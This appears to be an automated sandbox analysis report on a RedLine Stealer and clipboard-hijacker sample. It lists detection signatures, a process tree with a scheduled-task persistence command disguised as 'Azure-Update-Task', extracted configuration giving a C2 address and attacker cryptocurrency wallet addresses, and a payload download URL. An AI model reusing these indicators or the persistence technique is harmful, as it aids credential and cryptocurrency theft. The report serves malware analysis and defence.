
Windows Analysis Report eYvT1lg5Dy.exe

Overview

General Information

Sample Name: eYvT1lg5Dy.exe
Analysis ID: 490258
MD5: 355fbd5060b3bbaf8c5737b4279e9000
SHA1: 88fa1113f76294bade7fd9075cd5e4ea76cf5314
SHA256: 383f147b7eb4c815bc9def993cff994da41c7395092ceedd3c22d10e130b8c15
Tags: exe, RedLineStealer

Detection

Detected: Clipboard Hijacker, RedLine
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Yara detected RedLine Stealer
Found malware configuration
Multi AV Scanner detection for submitted file
Detected unpacking (overwrites its own PE header)
Detected unpacking (changes PE section rights)
Yara detected Clipboard Hijacker
Multi AV Scanner detection for dropped file
Tries to steal Crypto Currency Wallets
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Queries sensitive disk information (via WMI, Win32_DiskDrive, often done to detect virtual machines)
Machine Learning detection for dropped file
Contains functionality to compare user and computer (likely to detect sandboxes)
Uses schtasks.exe or at.exe to add and modify task schedules
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Antivirus or Machine Learning detection for unpacked file
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check the parent process ID (often done to detect debuggers and analysis systems)
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to dynamically determine API calls
Contains functionality to read the clipboard data
HTTP GET or POST without a user agent
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Enables debug privileges
Is looking for software installed on the system
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
AV process strings found (often used to terminate AV products)
Sample file is different than original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Drops PE files
Contains functionality to read the PEB
Detected TCP or UDP traffic on non-standard ports
PE / OLE file has an invalid certificate
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard

Process Tree

  • System is w10x64
  • eYvT1lg5Dy.exe (PID: 6504 cmdline: 'C:\Users\user\Desktop\eYvT1lg5Dy.exe' MD5: 355FBD5060B3BBAF8C5737B4279E9000)
    • conhost.exe (PID: 6572 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • filename.exe (PID: 5416 cmdline: 'C:\Users\user\AppData\Local\Temp\filename.exe' MD5: D508B954A785BDB77FDEFFCD4C56F8E5)
      • schtasks.exe (PID: 5536 cmdline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
        • conhost.exe (PID: 5524 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • sihost.exe (PID: 5784 cmdline: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe MD5: D508B954A785BDB77FDEFFCD4C56F8E5)
    • schtasks.exe (PID: 6672 cmdline: /C /create /F /sc minute /mo 1 /tn 'Azure-Update-Task' /tr 'C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 6760 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: Clipboard Hijacker

{"Crypto Addresses": ["0xb0cd1b2BBAd670F2077a096c3bEd2CdBcC5Fdf88", "TXQvcL1pmAyUH2navHQshfMZnCPodRVDZk", "1Kvd92m7d68hKTQ9xuiw8dYYyyJGERfLBK", "ltc1qthpmfg386hs6d7693jg3makep2mva9wxzhpc2n", "DQxZ4k7vxFDDLyRM5WgVhdJFD11Sv2vAGz", "0N1Y/53R10U5/BU51N355", "addr1qx7vnvylyguqn7xxee2n5m9l69a7emvcak3m6fc9qvn2xq07lauv8vz70htg7hqjgtg2r90fth2fc4qkwuuezels972qzagye8", "00000L0000T00MON00000000000000000000000Lgv8E6tn4hey1DBBrSPrmkSf3y8pXhgXNw00000000000000W0000000", "bc1qns4rqn3fhdzeuv8n3c7jansny9sywjrkdekz2v", "MUeW4pkFQtczm1yvves7LS1JCYpk3NdnzV", "Z1Kvd92m7d68hKTQ9xuiw8dYYyyJGERfLBK", "Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPE", "bnb13dvx2lhjvh8e4x6qz0manmfwd00h8hwpy37upp", "t1YGnYRkTaDW4kmKNxNTzEoCc434EGtVwJN", "Lgv8E6tn4hey1DBBrSPrmkSf3y8pXhgXNw", "44Ro9N6uFUdEAqo3DzHpkqgUPG1xzf1Lfe3F4VbcNSEaLYhdJDyBxyR96FfHai8VHEUYTDA41zhWQKABQ1Zf23Yr2mEawKg", "36dA9es5FtrvSdyPxxLEntQcKp9P6V8KaY"]}

Threatname: RedLine

{"C2 url": ["80.87.192.249:16640"], "Bot Id": "2"}

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
0000000B.00000002.435951957.0000000000400000.00000040.00020000.sdmp | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
00000001.00000002.435576900.00000000031A0000.00000004.00020000.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
0000000E.00000003.448804837.0000000002C70000.00000004.00000001.sdmp | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
0000000E.00000002.609959614.0000000002C60000.00000040.00000001.sdmp | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
00000001.00000002.436050083.00000000049AC000.00000004.00000001.sdmp | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
(7 further entries not shown)

Unpacked PEs

Source | Rule | Description | Author | Strings
11.2.filename.exe.400000.0.raw.unpack | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
14.3.sihost.exe.2c70000.0.raw.unpack | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
11.3.filename.exe.2c70000.0.raw.unpack | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
1.2.eYvT1lg5Dy.exe.31a0ee8.3.unpack | JoeSecurity_RedLine | Yara detected RedLine Stealer | Joe Security |
14.2.sihost.exe.400000.0.unpack | JoeSecurity_Clipboard_Hijacker | Yara detected Clipboard Hijacker | Joe Security |
(13 further entries not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 11.3.filename.exe.2c70000.0.raw.unpack | Malware Configuration Extractor: Clipboard Hijacker {"Crypto Addresses": ["0xb0cd1b2BBAd670F2077a096c3bEd2CdBcC5Fdf88", "TXQvcL1pmAyUH2navHQshfMZnCPodRVDZk", "1Kvd92m7d68hKTQ9xuiw8dYYyyJGERfLBK", "ltc1qthpmfg386hs6d7693jg3makep2mva9wxzhpc2n", "DQxZ4k7vxFDDLyRM5WgVhdJFD11Sv2vAGz", "0N1Y/53R10U5/BU51N355", "addr1qx7vnvylyguqn7xxee2n5m9l69a7emvcak3m6fc9qvn2xq07lauv8vz70htg7hqjgtg2r90fth2fc4qkwuuezels972qzagye8", "00000L0000T00MON00000000000000000000000Lgv8E6tn4hey1DBBrSPrmkSf3y8pXhgXNw00000000000000W0000000", "bc1qns4rqn3fhdzeuv8n3c7jansny9sywjrkdekz2v", "MUeW4pkFQtczm1yvves7LS1JCYpk3NdnzV", "Z1Kvd92m7d68hKTQ9xuiw8dYYyyJGERfLBK", "Ae2tdPwUPEZDqNhACJ3ZT5NdVjkNffGAwa4Mc9N95udKWYzt1VnFngLMnPE", "bnb13dvx2lhjvh8e4x6qz0manmfwd00h8hwpy37upp", "t1YGnYRkTaDW4kmKNxNTzEoCc434EGtVwJN", "Lgv8E6tn4hey1DBBrSPrmkSf3y8pXhgXNw", "44Ro9N6uFUdEAqo3DzHpkqgUPG1xzf1Lfe3F4VbcNSEaLYhdJDyBxyR96FfHai8VHEUYTDA41zhWQKABQ1Zf23Yr2mEawKg", "36dA9es5FtrvSdyPxxLEntQcKp9P6V8KaY"]}
Source: 1.2.eYvT1lg5Dy.exe.49ed87e.4.raw.unpack | Malware Configuration Extractor: RedLine {"C2 url": ["80.87.192.249:16640"], "Bot Id": "2"}
Multi AV Scanner detection for submitted file
Source: eYvT1lg5Dy.exe | Virustotal: Detection: 48%
Source: eYvT1lg5Dy.exe | Metadefender: Detection: 34%
Source: eYvT1lg5Dy.exe | ReversingLabs: Detection: 81%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\filename.exe | ReversingLabs: Detection: 48%
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe | ReversingLabs: Detection: 48%
Machine Learning detection for sample
Source: eYvT1lg5Dy.exe | Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe | Joe Sandbox ML: detected
Source: 11.2.filename.exe.400000.0.unpack | Avira: Label: TR/ATRAPS.Gen
Source: 14.2.sihost.exe.400000.0.unpack | Avira: Label: TR/ATRAPS.Gen

Compliance:

Detected unpacking (overwrites its own PE header)
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | Unpacked PE file: 1.2.eYvT1lg5Dy.exe.400000.0.unpack
Source: C:\Users\user\AppData\Local\Temp\filename.exe | Unpacked PE file: 11.2.filename.exe.400000.0.unpack
Source: C:\Users\user\AppData\Roaming\Microsoft\Network\sihost.exe | Unpacked PE file: 14.2.sihost.exe.400000.0.unpack
Source: eYvT1lg5Dy.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: C:\Users\user\Desktop\eYvT1lg5Dy.exe | File opened: C:\Windows\SysWOW64\msvcr100.dll
Source: unknown | HTTPS traffic detected: 52.219.104.152:443 -> 192.168.2.6:49741 version: TLS 1.2
Source: Binary string: 1C:\leg21\vicodohubef11\bemov\nosiya\dajavut.pdb source: eYvT1lg5Dy.exe
Source: Binary string: C:\leg21\vicodohubef11\bemov\nosiya\dajavut.pdb source: eYvT1lg5Dy.exe
Source: Binary string: _.pdb source: eYvT1lg5Dy.exe
Source: Binary string: C:\dufire\fukiliyow\xefugopaja.pdb source: filename.exe, 0000000B.00000000.428820278.000000000041B000.00000002.00020000.sdmp, sihost.exe, 0000000E.00000000.440386838.000000000041B000.00000002.00020000.sdmp, filename.exe.1.dr
Source: Joe Sandbox View | ASN Name: THEFIRST-ASRU THEFIRST-ASRU
Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: global traffic | HTTP traffic detected: GET /crypted.exe HTTP/1.1 Host: cli-4576347563476534786.s3.us-east-2.amazonaws.com Connection: Keep-Alive
Source: global traffic | TCP traffic: 192.168.2.6:49737 -> 80.87.192.249:16640
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49741
Source: unknown | Network traffic detected: HTTP traffic on port 49741 -> 443
Source: unknown | TCP traffic detected without corresponding DNS query: 80.87.192.249 (this identical entry appears 50 times in the report)
Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: i9https://www.facebook.com/chat/video/videocalldownload.php equals www.facebook.com (Facebook)
Source: eYvT1lg5Dy.exe, 00000001.00000002.438744669.00000000050AB000.00000004.00000001.sdmp | String found in binary or memory: ium PDF Plugin","versions":[{"comment":"Chromium PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"divx-player":{"group_name_matcher":"*DivX Web Player*","help_url":"https://support.google.com/chrome/?p=plugin_divx","lang":"en-US","mime_types":["video/divx","video/x-matroska"],"name":"DivX Web Player","url":"http://download.divx.com/player/divxdotcom/DivXWebPlayerInstaller.exe","versions":[{"status":"requires_authorization","version":"1.4.3.4"}]},"facebook-video-calling":{"group_name_matcher":"*Facebook Video*","lang":"en-US","mime_types":["application/skypesdk-plugin"],"name":"Facebook Video Calling","url":"https://www.facebook.com/chat/video/videocalldownload.php","versions":[{"comment":"We do not track version information for the Facebook Video Calling Plugin.","status":"requires_authorization","version":"0"}]},"google-chrome-pdf":{"group_name_matcher":"*Chrome PDF Viewer*","mime_types":[],"name":"Chrome PDF Viewer","versions":[{"comment":"Google Chrome PDF Viewer has no version information.","status":"fully_trusted","version":"0"}]},"google-chrome-pdf-plugin":{"group_name_matcher":"*Chrome PDF Plugin*","mime_types":[],"name":"Chrome PDF Plugin","versions":[{"comment":"Google Chrome PDF Plugin has no version information.","status":"fully_trusted","version":"0"}]},"google-earth":{"group_name_matcher":"*Google Earth*","lang":"en-US","mime_types":["application/geplugin"],"name":"Google Earth","url":"http://www.google.com/earth/explore/products/plugin.html","versions":[{"comment":"We do not track version information for the Google Earth Plugin.","status":"requires_authorization","version":"0"}]},"google-talk":{"group_name_matcher":"*Google Talk*","mime_types":[],"name":"Google Talk","versions":[{"comment":"'Google Talk Plugin' and 'Google Talk Plugin Video Accelerator' use two completely different versioning schemes, so we can't define a minimum version.","status":"requires_authorization","version":"0"}]},"google-update":{"group_name_matcher":"Google Update","mime-types":[],"name":"Google Update","versions":[{"comment":"Google Update plugin is versioned but kept automatically up to date","status":"requires_authorization","version":"0"}]},"ibm-java-runtime-environment":{"group_name_matcher":"*IBM*Java*","mime_types":["application/x-java-applet","application/x-java-applet;jpi-version=1.7.0_05","application/x-java-applet;version=1.1","application/x-java-applet;version=1.1.1","application/x-java-applet;version=1.1.2","application/x-java-applet;version=1.1.3","application/x-java-applet;version=1.2","application/x-java-applet;version=1.2.1","application/x-java-applet;version=1.2.2","application/x-java-applet;version=1.3","application/x-java-applet;version=1.3.1","application/x-java-applet;version=1.4","application/x-java-applet;version=1.4.1","application/x-java-applet;version=1.4.2","application/x-java-applet;version=1.5","application/x-java-applet;version=1.6","application/x-java-applet;version=1.7","application/x-java
Source: eYvT1lg5Dy.exe, 00000001.00000002.438895636.000000000516A000.00000004.00000001.sdmp | String found in binary or memory: http://appldnld.apple.com/QuickTime/041-3089.20111026.Sxpr4/QuickTimeInstaller.exe
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDCA-1.crt0
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: eYvT1lg5Dy.exe, 00000001.00000002.438333852.0000000004FD8000.00000004.00000001.sdmp | String found in binary or memory: http://cli-4576347563476534786.s3.us-east-2.amazonaws.com
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDCA-1.crl08
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDCA-1.crl0w
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: eYvT1lg5Dy.exe | String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/AckRequested
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequence
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CloseSequenceResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequence
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/CreateSequenceResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/SequenceAcknowledgement
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/TerminateSequence
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/TerminateSequenceResponse
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-rx/wsrm/200702/fault
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/dk/p_sha1$
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-secureconversation/200512/sct
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512#BinarySecret
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/AsymmetricKey
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Bearer
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/CK/PSHA1
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Cancel
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Issue
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Nonce
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/PublicKey
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Cancel
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Issue
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/Renew
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Cancel
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RST/SCT/Renew
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Cancel
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/CancelFinal
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Issue
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/Renew
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/RenewFinal
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Cancel
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTR/SCT/Renew
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/RSTRC/IssueFinal
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/Renew
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-sx/ws-trust/200512/SymmetricKey
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Aborted
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Commit
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Committed
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Completion
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Durable2PC
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepare
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Prepared
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/ReadOnly
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Replay
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Rollback
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/Volatile2PC
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wsat/2006/06/fault
Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmp | String found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/CreateCoordinationContext
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/CreateCoordinationContextResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/Register
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/RegisterResponse
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437419200.0000000004DD1000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/ws-tx/wscoor/2006/06/fault
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Base64Binary
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#HexBinary
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-utility-1.0.xsd
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-x509-token-profile-1.0#X509SubjectKeyIdentif
                      Source: eYvT1lg5Dy.exe, 00000001.00000002.437494677.0000000004E63000.00000004.00000001.sdmpString found in binary or memory: http://docs.oasis-open.org/wss/oasis-wss-kerberos-token-profile-1.1#GSS_Kerberosv5_AP_REQ
